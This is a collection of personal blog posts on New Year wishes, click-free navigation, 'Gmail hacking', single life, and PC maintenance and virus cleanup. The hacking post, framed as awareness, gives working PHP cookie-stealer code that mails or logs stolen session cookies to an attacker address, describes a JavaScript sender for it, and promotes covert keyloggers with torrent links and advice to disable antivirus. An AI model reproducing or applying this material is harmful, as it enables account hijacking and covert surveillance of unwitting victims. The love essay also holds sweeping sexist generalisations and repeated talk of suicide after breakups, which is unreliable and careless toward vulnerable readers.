What is life


A good question to ask you self what is life ?
Life is all about losing something and gaining something, at last leaving this world alone.  “In the end, it’s not the years in your life that count. It’s the life in your years” let’s welcome the New Year with smiles on our faces. I wish you all good health happiness and success in this new year 2016

Wish you Happy New Year everyone


31-12-2013, last day of the year, and last post of 2013, let’s thank each and everyone who made 2013 so wonderful. Lot of up and downs and still learning and hoping for the best to happen.
Enough of day dreams, enough of living in my virtual world, let me not repeat the mistakes because there are lot of new mistake to explore in 2014, let’s give a break for everything and let’s start a new beginning with new hopes, new expectations. Welcome 2014. Wish you happy new year everyone.

Navigate the Whole website without any Clicks


Wanna Know How you can Navigate the whole web-site without Clicking? Then Check out this dontclick.it

Basically There are three ways to Control the Button/Link

  1. Controlling the Button/Link with a Timer
  2. Controlling the Button/Link by wiping the Mouse Pointer over it from left to right or vice versa
  3. Controlling the Button/Link by moving the mouse pointer in a circular motion closely around the Button/Link

1. Controlling the Button/Link with a Timer

Button/Link is Activated by remaining mouse for several seconds on it.

Drawback of this concept of navigation slows down the speed at which content is activated and thus ready for consumption.

2. Controlling the Button/Link by wiping the Mouse Pointer over it

Button/Link is Activated by wiping the mouse pointer over it from left to right or vice versa. This is an easy and quick way to activate a button/link without a click.

Drawbacks of this type is chances are high that you unintendedly activate a button by accidently moving your mouse pointer over it.

3. Controlling the Button/Link by moving the mouse pointer in a circular motion

Button/Link is Activated by Moving the mouse pointer in a circular motion closely around the button. this also a easy way to activate the button/link without clicking and Accidental activation is nearly impossible.

Drawback of this type is user initially has to be shown, how to activate a button/link, since this kind of navigation is not obvious.

If every one starts using this type of mouse over to activate links this will become best way to activate the link or button with out clicking 🙂

Gmail Hacking


Hi Friends, Wanna know how people hack Gmail or any account?
Here we go,
    There are so many ways to hack Gmail or other  accounts , here I’m explaining in 3 levels
1.    Primary (very easy no need of knowing coding or hacking)
2.    Secondary (You should know hacking )
3.    Using Software (In this article I am going to explain about all these softwares.)
Primary Hacking:
                  Every one of us will know that while creating a new Gmail account there is an option for Security Question it may be What is your primary frequent flyer number or What is your library card number or What was your first phone number or What was your first teacher’s name or What is your father’s middle name or Write my own question rite. By the using of “can’t accesses your account” option your friend or best friend can answer that question and they can hack your account. That’s why do not share these information with anyone.
                Most of the people hack your account with the help of stay signed in option. Yes friends usually when we using own laptop or PC we always tick for stay signed in. When others use our computer than they can get our password from tools –> security –> saved passwords. So enemies are our friends only so be careful.
                      So before answering the Security Question think twice and give the answer.

Secondary Hacking:
       In Secondary level with help of cookies and Trojans, the person will hack the account
    
Introduction about Cookies
               Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer. The sender and the receiver.The sender can take many forms. In essence, it’s just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.The receiver, as the name suggests, is a device, which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure web server.
Step One: The Code
Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).As I said in the introduction, the receiver’s job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, “page.php?arg1=value”). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.
Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We’ll look at both.
          First, let’s look at sending it in an email. Here is what such a beast would look like (functioning code):
$cookie = $HTTP_GET_VARS[“cookie”]; // line 2
mail(“me@mydomain.com”, “Cookie stealer report”, $cookie); // line 3
?> // line 4
Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL (“stealer.php?cookie=x”) and stores it in the variable $cookie.
Line 3 accesses PHP’s mail() function and sends the cookie to “me@mydomain.com” with the subject of “Cookie stealer report”.
Line 4 tells the server that the PHP code ends here.
Next, we’ll look at my preferred method, which is storing the cookie in a log file. (functioning code)
$cookie = $HTTP_GET_VARS[“cookie”]; // line 2
$file = fopen(‘cookielog.txt’, ‘a’); // line 3
fwrite($file, $cookie . “\n\n”); // line 4
?> // line 5
Lines 1 and 2 are the same as before.
Line 3 opens the file “cookielog.txt” for writing, then stores the file’s handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and “\n\n” combines the two strings as one. The “\n\n” acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.
Step Two: Implementing the Stealer
          The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender. // Line 3
Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).
There are two main ways of implementing the sender:
     You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.
Introduction about Trojans:
                           Trojans are a type of virus. They are simply like a server in which enables hackers to get into and control the computer. A Trojan such as Subseven can enable a hacker to do various things such as control the mouse, eject the cd-rom drive, delete/download/upload files and much more.If it is very hard to digest than just understand, cookies are the some codes send through email or it will enter your computer through websites or through infected pen drive or CD If you have antivirus than update it regularly it will trace and delete the cookies and Trojans.
             To know how People hack your Computer or to check whether your computer were hacked or not just download this e- book and read Click here to Download
 Using Software:
            I know you will not believe how your friends hack your account plz read this and be careful.
                    Hope at least few people will know about these software  Steel Keylogger, All In One Keylogger, Ardamax Keylogger, etc.
        Let me give some brief introduction about key loggers:
If you install these key logger in your computer than you can monitor every activity on the computer including chat conversations, e-mails, keystrokes, desktop activities, microphone and more. Now you are thinking how it is possible rite. ?
         Here is the answer when you install these key logger software’s in your computer than it will copy the each and every key u pressed or typed in your keyboard into a text document from this text document you can see the keys or worlds entered by the user  so that’s how people hack your account
          Let me tell you in detail about all these Software’s individually
1.    All In One Keylogger:

                                              All In One Keylogger is an invisible surveillance tool that records every keystroke (including passwords) to an encrypted log file. The log file can be sent with email to a specified receiver. All In One Keylogger also monitors the internet activity by logging all URLs the user visits, the time and title of the active application, microphone sounds and clipboard. You can also configure it to take screenshots on desirable interval or on each mouse click and “Enter” key.
        How invisible is the keylogger?
            It is hard to find All in One Keylogger. You can configure it not to show up in the add/remove programs menu, start menu or the task bar. It is also invisible in Windows 98/NT/2000/XP/Vista/Windows 7 Task Manager.The Keylogger logs all typed keystrokes. You can find the keystrokes organized by the app they were typed, in the Textual Log. Just open the Keylogger Log Viewer, press the “View Textual Log” option and then press the “Filter Empty Rows” option to remove entries with no keystrokes. Then just press each row to see its keystrokes. (You can then press on the Generate HTML Report for better viewing the logs) if you wanna know password open this text document and pres Ctrl+F and type the email id and search there after email id you can get password
        The problem of using this software is, if you have to use this software than you have to disable antivirus because antivirus treat this software as a virus and delete the executive file.
To download this software click here for torrent
2.     Ardamax Keylogger:

Ardamax Keylogger is a keystroke recorder that captures user’s activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. In addition, you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.
In this software also same problem as I mention earlier. If you wanna use this software than you have to disable your antivirus.
To download this software click here for torrent 

3.    Steel Keylogger:

Features:
– Logs all keystrokes made on the computer as well as the title of the window the keystrokes are made in. Captures passwords and all other invisible text.
– Absolutely tiny and resource friendly. Only ~ 30Kb. Has never used more than 0.2% CPU.
– Can record all text which is copied to the clipboard (whenever Ctrl+C, Ctrl+X etc is pressed).
– Has an invisibility mode as well as user interface. Can be hidden on startup. (Ctrl + Alt + F8 to restore visibility).
– Undetectable to antivirus software (so far).
– Can Pause and Resume when you don’t want certain keystrokes recorded.
– Will never attempt to connect to the internet. This keeps it invisible to firewalls and means you can trust that it is never  sharing your logs with others
– No installation necessary.
To download this software click here for torrent 
            So before Using others computer be aware of all these software and be safe.
Any doubts please contact me at Santhosh.shivanarayana@gmail.com 
                          I am posting this article to let you know how people hack our account without our knowledge. If few become aware of this, I will be happy.                                                                                                                  

Are you Single or Committed ?


Definition of lover: Someone who stands by you through all the troubles which you wouldn’t have had if you stayed Single.

The day you fall in love with someone, you think is the happiest day of your life, but in actual you become the weakest person who can’t live without someone.

Love is like a flash one time happiness rest in trash No time to guess the unexpected happens keeping everything in mess
                                                                                                             –  SaurabhStar
  Love is beautiful until your daughter fall in love with someone
                                                                                                            – Shakespeare
Actually last Saturday I was doing some office work, & was online. One of my friend pinged me over facebook chat. We chatted for some time about casual things. Then he asked me about my job and all. I said,” Leave yaar it will be same every day. How about you? “The very next question he asked me what maga did you get any girl friend? Actually that moment I got angry because that was the 6th time I’m hearing the same question from my friends this month. I don’t know why he asked that question to me but after that I started thinking about why everyone asking this? Is having girlfriend is much important? Is it mandatory? can’t we live without one? So I’m writing this article to share my view of thinking about love. If any mistakes let me know I will try to correct myself thank you.
Difference between Being single and Committed
According to my view there is no love in this generation like Romeo and Juliet; if there is, the percentage is very less. I have seen so many of my friends who are committed. Always they will be on the phone. For them their girlfriend’s problems are more important than their problems or their family problems. If anything happens to their girlfriend they will show their anger on us (friends). For most of the people after getting committed they remember us (friends) only when they need help from us (There are exceptions also). If you love someone there is no guarantee that you’re going to marry the one you loved. And moreover I have seen so many break ups. I have seen a boy with 20 break ups so I don’t think this is love anymore. Study says don’t trust your lover if she/he had more than 3 break-ups because they have no idea what type of partner they’re searching for. And I have seen so many girls and boys dating more than 1 boy or girl at a time. Reason for this is back up it seems. I have seen so many who started drinking after their break up and some who even people changed their lover.
The sad feeling after break up= (How happy you were with that person) 2 * how Deep your relation was.
Everyone tells the same story falling in love can’t be explained you should experience that. At the same time the feeling of break up also can’t be explained right? I have heard so many getting years back because of break ups and love rejections. So it’s better to be single (Be single but mingle with everyone). And still I don’t know why boys fall in love with beautiful girls? I won’t think this is love. And girls are stupid to believe such type of boys because tomorrow if they find a more beautiful girl than you they will love them, not you right? There are so many films which support love but the fact is the films based on true love stories have had sad endings. I’m a big fan of Chetan Bhagat. He had explained in his book 2 states that “Love marriages around the world, Boy loves girl, girl loves boy they will get married. Love marriages in India there are few more steps: boy’s family has to love girl’s family and girl’s family has to love boy’s family, boy’s family has to love girl, girl’s family has to love boy, still if they love each other then they will get married”. Anyways 2 states is a happy ending. I want others also to have a happy ending. One of my best buddies always tells me, after marriage you have to be with your wife after that there is no way to be single so stay single till then. So be happy if you are single still. Enjoy the journey.
So many of my friends replied me like this when I asked them this question. How do you believe that boy or girl? The answer was fall in love with someone you will come to know. I got bored up with this kind of answers. And one more thing: I have lot of friends in that only few (I can count may be 6 or 7) are girls so I didn’t explore this type of answers with girls. But among them, I had a nice friend but when she gets committed she stopped talking to me. The reason was her boyfriend was possessive it seems there is no value for friendship when boyfriend comes right? I would like to give some suggestion for her here one fine day definitely you will come to know the value of friends and parents. Hope you are happy in Wipro.
              If your love is true the next step is marriage right? Here comes the big problem. “Parents” are ready to believe the person who stays in other countries ; they believe marriage brokers and they are ready to give dowry, but they are not ready to believe her daughter or son’s choice because of ego and caste issues; what a world! Really sometimes I feel very funny about this. Parents please respect your children’s choice: if everything is good go ahead or else convince your children about the problems they might face after marriage. But most of the parents never respect their children’s choice unwilling to be convinced leading to drastic steps of eloping with their lover. So please try to understand. What you want your children’s happiness right think over it.
Advantages of having Girlfriend:
When you get time you can spend time with them. For time pass they will be with you.
You will get support for all kinds of problems.
Always busy life; gives you value for your time at a later stage.
You can attend parties.
Disadvantages:
You have to change your habits.
You have to change your character.
You have to leave your friends.
You have to follow their rules and suggestions.
There is no freedom of space
Every day you have to talk to her.
You have to recharge her mobile and hence yourself.
Whenever they give missed call you have to talk getting yourself in a situation.
If any problem you have to solve her problem.
If anyone teases her you have to do something. You have to protect her from others.
Only For Boys:
                  Till today I have seen so many boys get year back because of girls but I’ve never seen a single girl get year back for the sake of love. And a study on girls (95%) says that they can forget any relationship in 3 months and they can spend normal life after break up but for boy it’s very difficult in most of the cases some boys became too emotional that they choose suicide. Is this what our parents expect from us?
            Everything is good if it’s going on in the right way or within limits. Love and girl friends should be a part of life, but most of us think that there is no life without love.
               Please don’t change yourself for your lover because if your lover loves you truly then she should accept you as you’re now, so there is no meaning in changing yourself. And one more important thing is never ever avoid your friends and parents for the sake of your lover. Because if you do this when break up happens these kinds of people have only one option: suicide. So please don’t do that. Life is too short. Forgive and forget quickly. Accept truly, enjoy the life. At the end of the day it matters how happy you’re rather than whether you have a lover or not, right? Live happy and leave others to live happy.
                 And this is very important please don’t waste your dad’s money on your lover. Because use and throw type of characters are more in girls. No money, then no love.
                  I really don’t know what is love and all and how it pans out also but one thing I can tell you: love is like polio once you love someone, you not able to forget that girl throughout your life. If break up happens, then you will become mad. I know you will get experience but it’s too painful living with that pain like polio. Once polio comes, your body will produce antibiotics and memory cells but it’s too late because your one part will be permanently over. So love and break up are also same. Be careful. If you get the right person then carry on in your way. As the pleasure bike advertisement says why should boys have all the fun? The same way why boys should have all the pain? Creating a virtual Emotional Atyachaar is what we wouldn’t like, right? Wish to see you happy guys .

If you’re not happy being single, you’ll never be happy in a relationship. Get your own life first, then share it with someone else.

Note: I don’t know much about girls but I know more about boys that’s why in this article I supported boys more; if there are any mistakes please feel free to share your view. Thank you.

Computer Matinence :)


        You may not realize it, but your computer and your car have something in common, they both need regular maintenance. No, you don’t need to change your computer’s oil. But you should be updating your software, keeping your anti virus subscription up to date, and checking for spyware. Read on to learn what you can do to help improve your computer’s security.
Getting started

               Here are some basics maintenance tasks you can do today to start improving your computer’s security. Be sure you make these part of your ongoing maintenance as well.

* Sign up for software update e-mail notices. Many software companies will send you e-mail whenever a software update is available. This is particularly important for your operating system (e.g., Microsoft VV!|VD0VV$® or Macintosh), your antivirus program, and your firewall.
* Register your software. If you still have registration forms for existing software, send them in. And be sure to register new software in the future. This is another way for the software manufacturer to alert you when new updates are available.
* Install software updates immediately.
When you get an update notice, download the update immediately and install it. (Remember, downloading and installing are two separate tasks.)
An ounce of prevention

A few simple steps will help you keep your files safe and clean.

* Step 1: Update your software
* Step 2: Backup your files
* Step 3: Use antivirus software and keep it updated
* Step 4: Change your passwords

Developing ongoing maintenance practices

Now that you’ve done some ground work, it’s time to start moving into longer term maintenance tasks. These are all tasks that you should do today (or as soon as possible) to get started. But for best results, make these a part of a regular maintenance schedule. I recommend setting aside time each week to help keep your computer secure.

* Back up your files. Backing up your files simply means creating a copy of your computer files that you can use in the event the originals are lost.

* Scan your files with up to date antivirus software. Use your antivirus scan tool regularly to search for potential computer viruses and worms. Also, check your antivirus program’s user manual to see if you can schedule an automatic scan of your computer.
.
* Change your passwords. Using the same password increases the odds that someone else will discover it. Change all of your passwords regularly to reduce your risk. Also, choose your passwords carefully. .

Making a schedule

One of the best ways to help protect your computer is to perform maintenance regularly. To help you keep track, I suggest making a regular “appointment” with your computer. Treat it like you would any other appointment. Record it in your datebook or online calendar, and if you cannot make it, reschedule. Remember, you are not only helping to improve your computer, you are also helping to protect your personal information 🙂

Caught A Virus ? ?


          Heard this one before? You must run antivirus software and keep it up to date or else your PC will get infected, you’ll lose all your data, and you’ll incur the wrath of every e-mail buddy you unknowingly infect because of your carelessness.
You know they’re right. Yet for one reason or another, you’re not running antivirus software, or you are but it’s not up to date. Maybe you turned off your virus scanner because it conflicted with another program. Maybe you got tired of upgrading after you bought Norton Antivirus 2006 2007, and 2008. Or maybe your annual subscription of virus definitions recently expired, and you’ve put off renewing.
Today’s viruses, worms, and so-called bots, which turn your PC into a zombie that does the hacker’s bidding (such as mass-mailing spam) aren’t going to announce their presence. Real viruses aren’t like the ones in Hollywood movies that melt down whole networks in seconds and destroy alien spacecraft. They operate in the background, quietly altering data, stealing private operations, or using your PC for their own illegal ends. This makes them hard to spot if you’re not well protected.
Is Your PC “Owned?”

I should start by saying that not every system oddity is due to a virus, worm, or bot. Is your system slowing down? Is your hard drive filling up rapidly? Are programs crashing without warning? These symptoms are more likely caused by Windows, or badly written legitimate programs, rather than malware. After all, people who write malware want to hide their program’s presence. People who write commercial software put icons all over your desktop. Who’s going to work harder to go unnoticed?

Other indicators that may, in fact, indicate that there’s nothing that you need to worry about, include:

* An automated e-mail telling you that you’re sending out infected mail. E-mail viruses and worms typically come from faked addresses.
* A frantic note from a friend saying they’ve been infected, and therefore so have you. This is likely a hoax. It’s especially suspicious if the note tells you the virus can’t be detected but you can get rid of it by deleting one simple file. Don’t be fooled and don’t delete that file.

I’m not saying that you should ignore such warnings. Copy the subject line or a snippet from the body of the e-mail and plug it into your favorite search engine to see if other people have received the same note. A security site may have already pegged it as a hoax.

Sniffing Out an InfectionThere are signs that indicate that your PC is actually infected. A lot of network activity coming from your system (when you’re not actually using Internet) can be a good indicator that something is amiss. A good software firewall, such as ZoneAlarm, will ask your permission before letting anything leave your PC, and will give you enough information to help you judge if the outgoing data is legitimate. By the way, the firewall that comes with Windows, even the improved version in XP Service Pack 2, lacks this capability.To put a network status light in your system tray, follow these steps: In Windows XP, choose Start, Control Panel, Network Connections, right-click the network connection you want to monitor, choose Properties, check “Show icon in notification area when connected,” and click OK.

If you’re interested in being a PC detective, you can sniff around further for malware. By hitting Ctrl-Alt-Delete in Windows, you’ll bring up the Task Manager, which will show you the various processes your system is running. Most, if not all, are legit, but if you see a file name that looks suspicious, type it into a search engine and find out what it is.

Want another place to look? In Windows XP, click Start, Run, type “services.msc” in the box, and press Enter. You’ll see detailed descriptions of the services Windows is running. Something look weird? Check with your search engine.Finally, you can do more detective work by selecting Start, Run, and typing “msconfig” in the box. With this tool you not only see the services running, but also the programs that your system is launching at startup. Again, check for anything weird.If any of these tools won’t run–or if your security software won’t run–that in itself is a good sign your computer is infected. Some viruses intentionally disable such programs as a way to protect themselves.

What to Do Next ? ? :)Once you’re fairly sure your system is infected, don’t panic. There are steps you can take to assess the damage, depending on your current level of protection.
* If you don’t have any antivirus software on your system, or if the software has stopped working, stay online and go for a free scan at one of several Web sites. There’s McAfee FreeScan, Symantec Security Check, and Trend Micro‘s HouseCall. If one doesn’t find anything, try two. In fact, running a free online virus scan is a good way to double-check the work of your own local antivirus program. When you’re done, buy or download a real antivirus program.
* If you have antivirus software, but it isn’t active, get offline, unplug wires whatever it takes to stop your computer from communicating via the Internet. Then, promptly perform a scan with the installed software.
* If nothing seems to be working, do more research on the Web. There are several online virus libraries where you can find out about known viruses. These sites often provide instructions for removing viruses, if manual removal is possible or a free removal tool if it isn’t. Check out GriSOFT‘s Virus Encyclopedia, Eset’s Virus Descriptions, McAffee‘s Virus Glossary, Symantec’s Virus Encyclopedia, or Trend Micro’s Virus Encyclopedia.
A Microgram of PreventionAssuming your system is now clean, you need to make sure it stays that way. Preventing a breach of your computer’s security is far more effective than cleaning up the mess afterwards. Start with a good security program, such Trend Micro’s PC-Cillin, which you can buy for $50 or u can download antivirus software from torrents but before downloading be care full your downloading correct software.Don’t want to shell out any money? You can cobble together security through free downloads, such as AVG Anti-Virus Free Edition, ZoneAlarm (a personal firewall), and Ad-Aware SE (an antispyware tool) or download trail versions it wil work good.

Just make sure you keep all security software up to date. The bad guys constantly try out new ways to fool security programs. Any security tool without regular, easy (if not automatic) updates isn’t worth your money or your time.

Speaking of updating, the same goes for Windows. Use Windows Update (it’s right there on your Start Menu) to make sure you’re getting all of the high priority updates. If you run Windows XP, make sure to get the Service Pack 2 update. To find out if you already have it, right-click My Computer, and select Properties. Under the General tab, under System, it should say “Service Pack 2.”

Here are a few more pointers for a virus-free life:

* Be careful with e-mail. Set your e-mail software security settings to high. Don’t open messages with generic-sounding subjects that don’t apply specifically to you from people you don’t know. Don’t open an attachment unless you’re expecting it.
* If you have broadband Internet access, such as DSL or cable, get a router, even if you only have one PC. A router adds an extra layer of protection because your PC is not connecting directly with the Internet.
* Check your Internet ports. These doorways between your computer and the Internet can be open, in which case your PC is very vulnerable; closed, but still somewhat vulnerable; or stealthed (or hidden), which is safest. Visit Gibson Research’s Web site and run the free ShieldsUP test to see your ports’ status. If some ports show up as closed or worse yet, open check your router’s documentation to find out how to hide them.

any doubt contact me at santhosh.shivanarayana@gmail.com